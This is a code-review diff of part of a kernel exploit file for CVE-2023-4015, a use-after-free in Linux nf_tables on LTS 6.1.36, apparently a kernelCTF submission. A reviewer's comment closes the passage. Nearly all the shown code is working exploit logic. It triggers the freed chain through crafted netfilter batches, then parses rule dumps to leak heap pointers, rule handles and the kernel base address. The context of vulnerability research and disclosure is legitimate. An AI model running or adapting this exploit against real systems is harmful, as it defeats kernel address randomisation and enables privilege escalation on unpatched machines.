pocs/linux/kernelctf/CVE-2023-4015_lts_2/exploit/lts-6.1.36/exploit.c

```diff
@@ -0,0 +1,654 @@
+        return -1;
+    }
+    batch_free(b);
+    if (run_callbacks(nlsock, NULL, NULL) < 0) {
+        ERROR("run_callbacks");
+        return -1;
+    }
+
+    chain c_effect = make_chain(current_table_name, "effect", NFT_CHAIN_BINDING);
+    expr e_effect = make_immediate_jump_expr(free_chain_name);
+    rule r_effect = make_rule(current_table_name, "effect", &e_effect, 1, NULL, 0, 0);
+    chain c_attack = make_chain(current_table_name, "attack", 0);
+    expr e_attack[2];
+    e_attack[0] = make_immediate_jump_expr("effect");
+    e_attack[1] = make_immediate_jump_expr("some_invalid_chain");
+    rule r_attack = make_rule(current_table_name, "attack", e_attack, 2, NULL, 0, 0);
+
+    b = batch_init(MNL_SOCKET_BUFFER_SIZE * 2);
+    batch_new_chain(b, c_effect);
+    batch_new_rule(b, r_effect);
+    batch_new_chain(b, c_attack);
+    batch_new_rule(b, r_attack);
+    batch_end(b);
+    if (batch_send(b, nlsock) == -1) {
+        ERROR("batch_send");
+        return -1;
+    }
+    batch_free(b);
+    run_callbacks(nlsock, NULL, NULL);
+
+    b = batch_init(MNL_SOCKET_BUFFER_SIZE * 2);
+    batch_del_chain(b, c_free);
+    batch_end(b);
+    if (batch_send(b, nlsock) == -1) {
+        ERROR("batch_send");
+        return -1;
+    }
+    batch_free(b);
+    if (run_callbacks(nlsock, NULL, NULL) < 0) {
+        ERROR("run_callbacks");
+        return -1;
+    }
+
+    INFO("Sleeping to wait for the work queue to actually free the chain");
+    sleep(1);
+
+    return 0;
+}
+
+static int dump_expr_leak_heap(expr e, void *dat) {
+    const char *data;
+
+    data = nftnl_expr_get_str(e, NFTNL_EXPR_IMM_CHAIN);
+    if (strlen(data) < 17) // list + handle
+        return MNL_CB_OK;
+
+    struct nft_rule *r = (struct nft_rule *)data;
+    heap = (uint64_t)r->list.next;
+    rule_handle = (r->handle & 0xffff) + 1; // we got the address of the next rule, handle should be +1
+    if ((heap & 0xff) == 0x90 || (heap & 0xff) == 0x10) { // we got leak to spray chain (rules list at offset 0x10 of nft_chain)
+        heap = (uint64_t)r->list.prev; // get address of a rule instead
+        rule_handle = (r->handle & 0xffff) - 1;  // we got the address of the previous rule, handle should be -1
+    }
+    INFO("heap = 0x%lx, rule_handle = %lu", heap, rule_handle);
+
+    return MNL_CB_OK;
+}
+
+static int dump_expr_leak_vmlinux(expr e, void *dat) {
+    const char *data;
+
+    data = nftnl_expr_get_str(e, NFTNL_EXPR_IMM_CHAIN);
+    if (strlen(data) < 8)
+        return MNL_CB_OK;
+
+    vmlinux = *(uint64_t *)data;
+    if (vmlinux >= 0xffffffff00000000) {
+        vmlinux -= NFT_NOTRACK_OPS;
+    }
+    INFO("vmlinux = 0x%lx", vmlinux);
+
+    return MNL_CB_OK;
+}
+
+static int dump_exprs(const struct nlmsghdr *nlh, void *data) {
+    rule r;
+
+    r = nftnl_rule_alloc();
+    nftnl_rule_nlmsg_parse(nlh, r);
+
+    nftnl_expr_foreach(r, data, NULL);
+
+    nftnl_rule_free(r);
+
+    return MNL_CB_OK;
+}
+
+static int leak_heap() {
```

Comment:
Could you add a comment about the object being sprayed that will reclaim the UAF'd object?